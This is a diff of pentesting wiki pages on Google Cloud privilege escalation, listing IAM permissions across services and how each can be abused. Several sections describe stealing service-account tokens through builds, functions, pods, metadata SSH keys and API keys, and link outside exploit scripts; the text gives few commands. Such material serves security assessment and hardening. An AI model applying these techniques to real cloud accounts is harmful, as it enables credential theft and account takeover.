In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.** In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**
### deploymentmanager.deployments.**update** ## deploymentmanager.deployments.**update**
This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful) This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful)
Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.** Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**
### deploymentmanager.deployments.**setIamPolicy** ## deploymentmanager.deployments.**setIamPolicy**
This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previos _deploymentmanager.deployments.create_ section. This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previos _deploymentmanager.deployments.create_ section.
## cloudbuild # cloudbuild
### cloudbuild.builds.create ## cloudbuild.builds.create
With this permission you can **submit a cloud build**. The cloudbuild machine will have in its filesystem by **default a token of the powerful cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com` . However, you can **indicate any service account inside the project** in the cloudbuild configuration.\ With this permission you can **submit a cloud build**. The cloudbuild machine will have in its filesystem by **default a token of the powerful cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com` . However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change). Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
@ -169,13 +167,13 @@ You can find the original exploit script [**here on GitHub**](https://github.com
For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/) For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
### cloudbuild.builds.update ## cloudbuild.builds.update
**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API). **Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).
## compute # compute
### compute.projects.setCommonInstanceMetadata ## compute.projects.setCommonInstanceMetadata
With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
Limitations: Limitations:
@ -189,25 +187,25 @@ For more information about how to exploit this permission check:
[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md) [gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %} {% endcontent-ref %}
### compute.instances.setMetadata ## compute.instances.setMetadata
This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**. This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**.
### compute.instances.setIamPolicy ## compute.instances.setIamPolicy
This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
### **compute.instances.osLogin** ## **compute.instances.osLogin**
If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance. If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance.
### **compute.instances.osAdminLogin** ## **compute.instances.osAdminLogin**
If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance. If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance.
## container # container
### container.clusters.get ## container.clusters.get
This permission allows to **gather credentials for the Kubernetes cluster** using something like: This permission allows to **gather credentials for the Kubernetes cluster** using something like:
@ -221,24 +219,24 @@ Without extra permissions, the credentials are pretty basic as you can **just li
Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet. Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet.
{% endhint %} {% endhint %}
### container.clusters.getCredentials ## container.clusters.getCredentials
Apparently this permission might be useful to gather auth credentials (basic auth method isn't supported anymore by GKE if you use the latest GKE versions). Apparently this permission might be useful to gather auth credentials (basic auth method isn't supported anymore by GKE if you use the latest GKE versions).
### container.roles.escalate/container.clusterRoles.escalate ## container.roles.escalate/container.clusterRoles.escalate
**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour. **Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour.
**container.roles.create** and/or **container.roles.update** OR **container.clusterRoles.create** and/or **container.clusterRoles.update** respectively are also **necessary** to perform those privilege escalation actions.\ **container.roles.create** and/or **container.roles.update** OR **container.clusterRoles.create** and/or **container.clusterRoles.update** respectively are also **necessary** to perform those privilege escalation actions.\
### container.roles.bind/container.clusterRoles.bind ## container.roles.bind/container.clusterRoles.bind
**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. **Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour.
**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions. **container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions.
### container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update ## container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update
All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\ All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\
For more information check: For more information check:
@ -249,30 +247,30 @@ For more information check:
As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used). As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used).
### container.secrets.get, container.secrets.list ## container.secrets.get, container.secrets.list
As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#listing-secrets), with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them. As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#listing-secrets), with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them.
### container.pods.exec ## container.pods.exec
With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**. With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**.
### container.pods.portForward ## container.pods.portForward
As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#port-forward), with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.** As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#port-forward), with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.**
### container.serviceAccounts.createToken ## container.serviceAccounts.createToken
Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it. Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it.
### container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update ## container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update
These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\ These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\
For more information [**follow this link**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller). For more information [**follow this link**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller).
## storage # storage
### storage.hmacKeys.create ## storage.hmacKeys.create
There is a feature of Cloud Storage, “interoperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**. There is a feature of Cloud Storage, “interoperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**.
@ -282,14 +280,14 @@ HMAC keys belonging to your user cannot be accessed through the API and must be
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
### storage.objects.get ## storage.objects.get
This permission allows you to **download files stored inside Gcp Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some Gcp services stores their information in buckets: This permission allows you to **download files stored inside Gcp Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some Gcp services stores their information in buckets:
* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code. * **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.
* **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**. * **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
### storage.objects.create, storage.objects.delete ## storage.objects.create, storage.objects.delete
In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object\_permissions), you need also `storage.objects.delete` to **modify** an existent object. In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object\_permissions), you need also `storage.objects.delete` to **modify** an existent object.
@ -301,15 +299,15 @@ Moreover, several GCP services also **store code inside buckets** that later is
* **GCR (Container Registry)**: The **container images are stored inside buckets**. So if you have write access over them, you could **modify the images** and execute your own code whenever that container is used. * **GCR (Container Registry)**: The **container images are stored inside buckets**. So if you have write access over them, you could **modify the images** and execute your own code whenever that container is used.
* The bucket used by GCR will have an URL similar to `gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)). * The bucket used by GCR will have an URL similar to `gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
### storage.objects.setIamPolicy ## storage.objects.setIamPolicy
You can give you permission to **abuse any of the previous scenarios of this section**. You can give you permission to **abuse any of the previous scenarios of this section**.
## storage.objects Write permission # storage.objects Write permission
If you can modify or add objects in buckets you might be able to escalate your privileges to other resources that are using the bucket to store code that they execute. If you can modify or add objects in buckets you might be able to escalate your privileges to other resources that are using the bucket to store code that they execute.
### Composer ## Composer
**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features: **Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
@ -317,7 +315,7 @@ If you can modify or add objects in buckets you might be able to escalate your p
* It stores the **code in a bucket**, therefore, **anyone with write access over that bucket** is going to be able change/add a DGA code (the code Apache Airflow will execute)\ * It stores the **code in a bucket**, therefore, **anyone with write access over that bucket** is going to be able change/add a DGA code (the code Apache Airflow will execute)\
Then, if you have **write access over the bucket Composer is using** to store the code you can **privesc to the SA running in the GKE cluster**. Then, if you have **write access over the bucket Composer is using** to store the code you can **privesc to the SA running in the GKE cluster**.
## References # References
* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) * [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) * [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Privesc to Resources # cloudfunctions
## cloudfunctions ## cloudfunctions.functions.create,iam.serviceAccounts.actAs
### cloudfunctions.functions.create,iam.serviceAccounts.actAs
For this method, we will be **creating a new Cloud Function with an associated Service Account** that we want to gain access to. Because Cloud Function invocations have **access to the metadata** API, we can request a token directly from it, just like on a Compute Engine instance. For this method, we will be **creating a new Cloud Function with an associated Service Account** that we want to gain access to. Because Cloud Function invocations have **access to the metadata** API, we can request a token directly from it, just like on a Compute Engine instance.
@ -40,7 +38,7 @@ The script creates the function and waits for it to deploy, then it runs it and
The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions). The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).
### cloudfunctions.functions.update,iam.serviceAccounts.actAs ## cloudfunctions.functions.update,iam.serviceAccounts.actAs
Similar to _cloudfunctions.functions.create_, this method **updates (overwrites) an existing function instead of creating a new one**. The API used to update the function also allows you to **swap the Service Account if you have another one you want to get the token for**. The script will update the target function with the malicious code, then wait for it to deploy, then finally invoke it to be returned the Service Account access token. Similar to _cloudfunctions.functions.create_, this method **updates (overwrites) an existing function instead of creating a new one**. The API used to update the function also allows you to **swap the Service Account if you have another one you want to get the token for**. The script will update the target function with the malicious code, then wait for it to deploy, then finally invoke it to be returned the Service Account access token.
@ -52,9 +50,9 @@ The following **permissions are required** for this method:
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py). The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
## compute # compute
### compute.instances.create,iam.serviceAccounts.actAs ## compute.instances.create,iam.serviceAccounts.actAs
This method **creates a new Compute Engine instance with a specified Service Account**, then **sends the token** belonging to that Service Account to an **external server.** This method **creates a new Compute Engine instance with a specified Service Account**, then **sends the token** belonging to that Service Account to an **external server.**
@ -72,9 +70,9 @@ The following **permissions are required** for this method:
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py). The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).
## run # run
### run.services.create,iam.serviceAccounts.actAs ## run.services.create,iam.serviceAccounts.actAs
Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Accounts** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be performed to it to get the token. Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Accounts** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be performed to it to get the token.
@ -90,9 +88,9 @@ This method uses an included Docker image that must be built and hosted to explo
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage). The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage).
## Cloudscheduler # Cloudscheduler
### cloudscheduler.jobs.create,iam.serviceAccounts.actAs ## cloudscheduler.jobs.create,iam.serviceAccounts.actAs
Cloud Scheduler allows you to set up cron jobs targeting arbitrary HTTP endpoints. **If that endpoint is a \*.googleapis.com endpoint**, then you can also tell Scheduler that you want it to authenticate the request **as a specific Service Account**, which is exactly what we want. Cloud Scheduler allows you to set up cron jobs targeting arbitrary HTTP endpoints. **If that endpoint is a \*.googleapis.com endpoint**, then you can also tell Scheduler that you want it to authenticate the request **as a specific Service Account**, which is exactly what we want.
@ -114,9 +112,9 @@ To escalate our privileges with this method, we just need to **craft the HTTP re
A similar method may be possible with Cloud Tasks, but we were not able to do it in our testing. A similar method may be possible with Cloud Tasks, but we were not able to do it in our testing.
## orgpolicy # orgpolicy
### orgpolicy.policy.set ## orgpolicy.policy.set
This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download. This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download.
@ -126,13 +124,13 @@ The screenshot above shows that the _appengine.disableCodeDownload_ constraint i
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py). The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
## serviceusage # serviceusage
The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
### serviceusage.apiKeys.create ## serviceusage.apiKeys.create
There is another method of authenticating with GCP APIs known as API keys. By default, they are created with no restrictions, which means they have access to the entire GCP project they were created in. We can capitalize on that fact by creating a new API key that may have more privileges than our own user. There is no official API for this, so a custom HTTP request needs to be sent to _https://apikeys.clients6.google.com/_ (or _https://apikeys.googleapis.com/_). This was discovered by monitoring the HTTP requests and responses while browsing the GCP web console. For documentation on the restrictions associated with API keys, visit [this link](https://cloud.google.com/docs/authentication/api-keys). There is another method of authenticating with GCP APIs known as API keys. By default, they are created with no restrictions, which means they have access to the entire GCP project they were created in. We can capitalize on that fact by creating a new API key that may have more privileges than our own user. There is no official API for this, so a custom HTTP request needs to be sent to _https://apikeys.clients6.google.com/_ (or _https://apikeys.googleapis.com/_). This was discovered by monitoring the HTTP requests and responses while browsing the GCP web console. For documentation on the restrictions associated with API keys, visit [this link](https://cloud.google.com/docs/authentication/api-keys).
@ -146,7 +144,7 @@ The screenshot above shows a POST request being sent to retrieve a new API key f
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py). The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py).
### serviceusage.apiKeys.list ## serviceusage.apiKeys.list
Another undocumented API was found for listing API keys that have already been created (this can also be done in the web console). Because you can still see the API keys value after its creation, we can pull all the API keys in the project. Another undocumented API was found for listing API keys that have already been created (this can also be done in the web console). Because you can still see the API keys value after its creation, we can pull all the API keys in the project.
@ -156,13 +154,13 @@ The screenshot above shows that the request is exactly the same as before, it ju
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py). The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py).
## apikeys # apikeys
The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
### apikeys.keys.create <a href="#apikeys.keys.create" id="apikeys.keys.create"></a> ## apikeys.keys.create <a href="#apikeys.keys.create" id="apikeys.keys.create"></a>
This permission allows to **create an API key**: This permission allows to **create an API key**:
@ -181,7 +179,7 @@ Operation [operations/akmf.p7-[...]9] complete. Result: {
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/b-apikeys.keys.create.sh). You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/b-apikeys.keys.create.sh).
### apikeys.keys.getKeyString,apikeys.keys.list <a href="#apikeys.keys.getkeystringapikeys.keys.list" id="apikeys.keys.getkeystringapikeys.keys.list"></a> ## apikeys.keys.getKeyString,apikeys.keys.list <a href="#apikeys.keys.getkeystringapikeys.keys.list" id="apikeys.keys.getkeystringapikeys.keys.list"></a>
These permissions allows **list and get all the apiKeys and get the Key**: These permissions allows **list and get all the apiKeys and get the Key**:
@ -194,12 +192,12 @@ done
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
### apikeys.keys.regenerate,apikeys.keys.list <a href="#serviceusage.apikeys.regenerateapikeys.keys.list" id="serviceusage.apikeys.regenerateapikeys.keys.list"></a> ## apikeys.keys.regenerate,apikeys.keys.list <a href="#serviceusage.apikeys.regenerateapikeys.keys.list" id="serviceusage.apikeys.regenerateapikeys.keys.list"></a>
These permissions will (potentially) allow you to **list and regenerate all the apiKeys getting the new Key**.\ These permissions will (potentially) allow you to **list and regenerate all the apiKeys getting the new Key**.\
Its not possible to use this from `gcloud` but you probably can use it via the API. Once its supported, the exploitation will be similar to the previous one (I guess). Its not possible to use this from `gcloud` but you probably can use it via the API. Once its supported, the exploitation will be similar to the previous one (I guess).
### apikeys.keys.lookup <a href="#apikeys.keys.lookup" id="apikeys.keys.lookup"></a> ## apikeys.keys.lookup <a href="#apikeys.keys.lookup" id="apikeys.keys.lookup"></a>
This is extremely useful to check to **which GCP project an API key that you have found belongs to**: This is extremely useful to check to **which GCP project an API key that you have found belongs to**:
@ -211,17 +209,17 @@ parent: projects/5[...]6/locations/global
In this scenario it could also be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check what you can access with the API key In this scenario it could also be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check what you can access with the API key
## secretmanager # secretmanager
### secretmanager.secrets.get ## secretmanager.secrets.get
This give you access to read the secrets from the secret manager. This give you access to read the secrets from the secret manager.
### secretmanager.secrets.setIamPolicy ## secretmanager.secrets.setIamPolicy
This give you access to give you access to read the secrets from the secret manager. This give you access to give you access to read the secrets from the secret manager.
## \*.setIamPolicy # \*.setIamPolicy
If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it. If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.
@ -236,17 +234,17 @@ An **example** of privilege escalation abusing .setIamPolicy (in this case in a
[gcp-buckets-brute-force-and-privilege-escalation.md](../gcp-buckets-brute-force-and-privilege-escalation.md) [gcp-buckets-brute-force-and-privilege-escalation.md](../gcp-buckets-brute-force-and-privilege-escalation.md)
{% endcontent-ref %} {% endcontent-ref %}
## Generic Interesting Permissions # Generic Interesting Permissions
### \*.create, \*.update ## \*.create, \*.update
